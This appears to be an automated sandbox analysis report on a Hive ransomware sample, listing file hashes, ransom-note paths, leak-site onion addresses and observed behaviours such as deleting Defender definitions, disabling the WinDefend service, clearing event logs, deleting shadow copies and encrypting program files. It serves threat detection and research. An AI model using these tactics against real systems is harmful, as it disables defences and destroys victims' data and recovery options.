Analysis
-
max time kernel
249s -
max time network
192s -
platform
windows10_x64 -
resource
win10-en-20211208 -
submitted
12-01-2022 19:26
Static task
static1
Behavioral task
behavioral1
Sample
5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe
Resource
win7-en-20211208
General
-
Target
5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe
-
Size
3.1MB
-
MD5
f5d7efaec3c1274b0aaa704a6caa1671
-
SHA1
ec5c25e1cee1dca5c75baf5a6e3bec69441959dc
-
SHA256
5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d
-
SHA512
dab0a8060e9012706ae6ba46adeb2f18e5edecdc187e856989236dd0edb46ed7912cee97cee1c9fb075724c5d736b07e418991d1a3793bee6770d51618dd607f
Malware Config
Extracted
C:\Program Files\7-Zip\GyDM_HOW_TO_DECRYPT.txt
hive
http://hiveleakdbtnp76ulyhi52eag6c6tyc3xw7ez7iqy6wc34gd2nekazyd.onion/
http://hivecust6vhekztbqgdnkks64ucehqacge3dij3gyrrpdp57zoq3ooqd.onion/
Signatures
-
Deletes Windows Defender Definitions 2 TTPs 1 IoCs
Uses mpcmdrun utility to delete all AV definitions.
Processes:
MpCmdRun.exepid process 1496 MpCmdRun.exe -
Hive
A ransomware written in Golang first seen in June 2021.
-
Modifies security service 2 TTPs 1 IoCs
Processes:
reg.exedescription ioc process Set value (int) \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\WinDefend\Start = "4" reg.exe -
Clears Windows event logs 1 TTPs
-
Deletes shadow copies 2 TTPs
Ransomware often targets backup files to inhibit system recovery.
-
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
-
Drops file in Program Files directory 64 IoCs
Processes:
5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exedescription ioc process File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\manifestAssets\contrast-black\Square44x44Logo.targetsize-256_altform-unplated.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Assets\Audio\Skype_Call_Failed.m4a 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\gl_60x42.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\he\msipc.dll.mui.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_kv9Nv_CNrH80.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SUMIPNTG\SUMIPNTG.ELM.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_LSN7vgJSg6g0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeWideTile.scale-150.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\it-it\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_sMVkP1NPZso0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\combinepdf\js\nls\nl-nl\GyDM_HOW_TO_DECRYPT.txt 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\exportpdfupsell-app\js\plugins\rhp\GyDM_HOW_TO_DECRYPT.txt 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\Standard2019VL_KMS_Client_AE-ul-oob.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_s2_hMgOyzJc0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_x64__8wekyb3d8bbwe\Assets\starttile.dualsim2.sad.scale-200.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\AppTiles\MapsAppList.targetsize-96_altform-unplated.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\OutlookMailMediumTile.scale-400.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_sortedby_up_selected_18.svg.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_u20freu1K1A0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Microsoft Office\root\Office16\MSIPC\en-us\msipc.dll.mui.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_zKwDXLNIbTg0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsAlarms_10.1702.333.0_x64__8wekyb3d8bbwe\Assets\AlarmsBadge.contrast-white_scale-200.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_10.1702.301.0_x64__8wekyb3d8bbwe\Assets\VoiceRecorderAppList.contrast-white_targetsize-30_altform-unplated.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.XboxGameOverlay_1.15.2003.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\GamesXboxHubSmallTile.scale-100.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-125.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\win8-scrollbar\arrow-left.gif.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_KgwdRolNN7Q0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsCamera_2017.125.40.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\WindowsIcons\WindowsCameraMedTile.contrast-white_scale-125.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\CalculatorSmallTile.scale-125.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\add-account\js\nls\fi-fi\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_v479qaNH8wY0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\fss\css\faf-main.css.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_5k0lcdEwqAg0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\send-for-sign\js\nls\zh-cn\GyDM_HOW_TO_DECRYPT.txt 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNoteAppList.scale-200.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\ExchangeMediumTile.scale-200.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Windows Mail\en-US\msoeres.dll.mui 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\StarClub\challenge_freecell.jpg 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteNotebookSmallTile.scale-125.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-black\HxCalendarAppList.targetsize-60.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\update_tracking\org-netbeans-api-visual.xml.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_opXLKsWzlOU0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_MAK_AE-ul-phn.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_9RyT3Iu5DpM0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\SLATE\THMBNAIL.PNG.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_8oDcoUIAlmg0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\beer.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\task-handler\js\nls\da-dk\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_bUnJ5rFiI500.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\unified-share\js\nls\ko-kr\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_Yj2jYxo9xW00.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.simpleconfigurator.manipulator.nl_ja_4.4.0.v20140623020002.jar.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_Xg25oex9Nls0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\OneNoteR_OEM_Perp-pl.xrm-ms.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_gdPn1VxxTSI0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Microsoft Office\root\Templates\1033\Training.potx.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_sb4odawn_Tc0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.NET.Native.Framework.1.3_1.3.24201.0_x86__8wekyb3d8bbwe\AppxManifest.xml 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\editpdf\images\rhp_world_icon_2x.png.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_SNQAZIWfGI80.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fsdefinitions\osknumpad.xml 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\visualvm\platform\modules\locale\org-netbeans-swing-outline_ja.jar.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_46NHKIJyPm80.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_10.1702.312.0_x64__8wekyb3d8bbwe\Assets\CalculatorMedTile.contrast-white_scale-200.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsCalculator_2017.131.1904.0_neutral_~_8wekyb3d8bbwe\AppxBlockMap.xml 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\scan-files\css\main-selector.css.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_XKl21rT2vHI0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\LEVEL\LEVEL.ELM.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_VnwmtVJie2E0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Flags\large\ss_60x42.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\RadialControl\Rotate_E7AD_HC_64x64.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\Logo.scale-100.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sample-files\js\nls\root\ui-strings.js.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_8LZ7MFiTx8o0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File created C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\BLENDS\GyDM_HOW_TO_DECRYPT.txt 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MicrosoftSolitaireCollection_3.14.1181.0_x64__8wekyb3d8bbwe\Assets\Tournament\GameModeTripeaks.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-black\OneNotePageSmallTile.scale-125.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.MSPaint_1.1702.28017.0_x64__8wekyb3d8bbwe\Assets\Images\Stickers\Thumbnails\Sticker_Icon_Flag.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-150_8wekyb3d8bbwe\Assets\iheart-radio.scale-150.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-files\js\nls\nl-nl\GyDM_HOW_TO_DECRYPT.txt 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\es-ES\FlickLearningWizard.exe.mui 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Common Files\microsoft shared\ink\fr-FR\InkObj.dll.mui 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Microsoft Office\root\vfs\ProgramFilesCommonX64\Microsoft Shared\THEMES16\CONCRETE\THMBNAIL.PNG.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_onKnrY9HHIo0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\Microsoft.Messaging_3.26.24002.0_neutral_split.scale-150_8wekyb3d8bbwe\Assets\starttile.smile.small.scale-150.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\contrast-white\HxMailSmallTile.scale-400.png 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe File opened for modification C:\Program Files\Java\jdk1.8.0_66\jre\lib\fonts\LucidaBrightDemiItalic.ttf.qY4VudJjR7nkvyNAzjzRjlANMqzOxGHVIEv-frT4Kqb_WZ5an1CMDXY0.jhps7 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -
Launches sc.exe
Sc.exe is a Windows utlilty to control services on the system.
-
Interacts with shadow copies 2 TTPs 1 IoCs
Shadow copies are often targeted by ransomware to inhibit system recovery.
Processes:
vssadmin.exepid process 3512 vssadmin.exe -
Modifies registry class 3 IoCs
Processes:
reg.exereg.exereg.exedescription ioc process Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP reg.exe Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP reg.exe -
Runs net.exe
-
Suspicious behavior: EnumeratesProcesses 8 IoCs
Processes:
powershell.exepowershell.exe5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exepid process 1764 powershell.exe 1764 powershell.exe 1764 powershell.exe 3388 powershell.exe 3388 powershell.exe 3388 powershell.exe 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe -
Suspicious use of AdjustPrivilegeToken 64 IoCs
Processes:
wevtutil.exewevtutil.exewevtutil.exewmic.exewmic.exedescription pid process Token: SeSecurityPrivilege 3496 wevtutil.exe Token: SeBackupPrivilege 3496 wevtutil.exe Token: SeSecurityPrivilege 528 wevtutil.exe Token: SeBackupPrivilege 528 wevtutil.exe Token: SeSecurityPrivilege 3616 wevtutil.exe Token: SeBackupPrivilege 3616 wevtutil.exe Token: SeIncreaseQuotaPrivilege 4080 wmic.exe Token: SeSecurityPrivilege 4080 wmic.exe Token: SeTakeOwnershipPrivilege 4080 wmic.exe Token: SeLoadDriverPrivilege 4080 wmic.exe Token: SeSystemProfilePrivilege 4080 wmic.exe Token: SeSystemtimePrivilege 4080 wmic.exe Token: SeProfSingleProcessPrivilege 4080 wmic.exe Token: SeIncBasePriorityPrivilege 4080 wmic.exe Token: SeCreatePagefilePrivilege 4080 wmic.exe Token: SeBackupPrivilege 4080 wmic.exe Token: SeRestorePrivilege 4080 wmic.exe Token: SeShutdownPrivilege 4080 wmic.exe Token: SeDebugPrivilege 4080 wmic.exe Token: SeSystemEnvironmentPrivilege 4080 wmic.exe Token: SeRemoteShutdownPrivilege 4080 wmic.exe Token: SeUndockPrivilege 4080 wmic.exe Token: SeManageVolumePrivilege 4080 wmic.exe Token: 33 4080 wmic.exe Token: 34 4080 wmic.exe Token: 35 4080 wmic.exe Token: 36 4080 wmic.exe Token: SeIncreaseQuotaPrivilege 3120 wmic.exe Token: SeSecurityPrivilege 3120 wmic.exe Token: SeTakeOwnershipPrivilege 3120 wmic.exe Token: SeLoadDriverPrivilege 3120 wmic.exe Token: SeSystemProfilePrivilege 3120 wmic.exe Token: SeSystemtimePrivilege 3120 wmic.exe Token: SeProfSingleProcessPrivilege 3120 wmic.exe Token: SeIncBasePriorityPrivilege 3120 wmic.exe Token: SeCreatePagefilePrivilege 3120 wmic.exe Token: SeBackupPrivilege 3120 wmic.exe Token: SeRestorePrivilege 3120 wmic.exe Token: SeShutdownPrivilege 3120 wmic.exe Token: SeDebugPrivilege 3120 wmic.exe Token: SeSystemEnvironmentPrivilege 3120 wmic.exe Token: SeRemoteShutdownPrivilege 3120 wmic.exe Token: SeUndockPrivilege 3120 wmic.exe Token: SeManageVolumePrivilege 3120 wmic.exe Token: 33 3120 wmic.exe Token: 34 3120 wmic.exe Token: 35 3120 wmic.exe Token: 36 3120 wmic.exe Token: SeIncreaseQuotaPrivilege 3120 wmic.exe Token: SeSecurityPrivilege 3120 wmic.exe Token: SeTakeOwnershipPrivilege 3120 wmic.exe Token: SeLoadDriverPrivilege 3120 wmic.exe Token: SeSystemProfilePrivilege 3120 wmic.exe Token: SeSystemtimePrivilege 3120 wmic.exe Token: SeProfSingleProcessPrivilege 3120 wmic.exe Token: SeIncBasePriorityPrivilege 3120 wmic.exe Token: SeCreatePagefilePrivilege 3120 wmic.exe Token: SeBackupPrivilege 3120 wmic.exe Token: SeRestorePrivilege 3120 wmic.exe Token: SeShutdownPrivilege 3120 wmic.exe Token: SeDebugPrivilege 3120 wmic.exe Token: SeSystemEnvironmentPrivilege 3120 wmic.exe Token: SeRemoteShutdownPrivilege 3120 wmic.exe Token: SeUndockPrivilege 3120 wmic.exe -
Suspicious use of WriteProcessMemory 64 IoCs
Processes:
5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exenet.exedescription pid process target process PID 3480 wrote to memory of 1292 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 1292 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 1292 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1292 wrote to memory of 3484 1292 net.exe net1.exe PID 1292 wrote to memory of 3484 1292 net.exe net1.exe PID 1292 wrote to memory of 3484 1292 net.exe net1.exe PID 3480 wrote to memory of 1248 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 1248 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 1248 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 1248 wrote to memory of 2548 1248 net.exe net1.exe PID 1248 wrote to memory of 2548 1248 net.exe net1.exe PID 1248 wrote to memory of 2548 1248 net.exe net1.exe PID 3480 wrote to memory of 3700 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 3700 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 3700 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3700 wrote to memory of 2500 3700 net.exe net1.exe PID 3700 wrote to memory of 2500 3700 net.exe net1.exe PID 3700 wrote to memory of 2500 3700 net.exe net1.exe PID 3480 wrote to memory of 3652 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 3652 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 3652 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3652 wrote to memory of 3268 3652 net.exe net1.exe PID 3652 wrote to memory of 3268 3652 net.exe net1.exe PID 3652 wrote to memory of 3268 3652 net.exe net1.exe PID 3480 wrote to memory of 2688 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 2688 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 2688 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 2688 wrote to memory of 2112 2688 net.exe net1.exe PID 2688 wrote to memory of 2112 2688 net.exe net1.exe PID 2688 wrote to memory of 2112 2688 net.exe net1.exe PID 3480 wrote to memory of 328 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 328 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 328 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 328 wrote to memory of 1788 328 net.exe net1.exe PID 328 wrote to memory of 1788 328 net.exe net1.exe PID 328 wrote to memory of 1788 328 net.exe net1.exe PID 3480 wrote to memory of 3328 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 3328 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 3328 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3328 wrote to memory of 3872 3328 net.exe net1.exe PID 3328 wrote to memory of 3872 3328 net.exe net1.exe PID 3328 wrote to memory of 3872 3328 net.exe net1.exe PID 3480 wrote to memory of 3676 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 3676 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3480 wrote to memory of 3676 3480 5baa791a0bcaff60080472bfa434631bc7524b8a10989ed6e7b200f010cb8e1d.exe net.exe PID 3676 wrote to memory of 956 3676 net.exe net1.exe PID 3676 wrote to memory of 956 3676 net.exe net1.exe PID 3676 wrote to memory of 956 3676 net.exe net1.exe PID 3480 wrote to memory of 60 3480 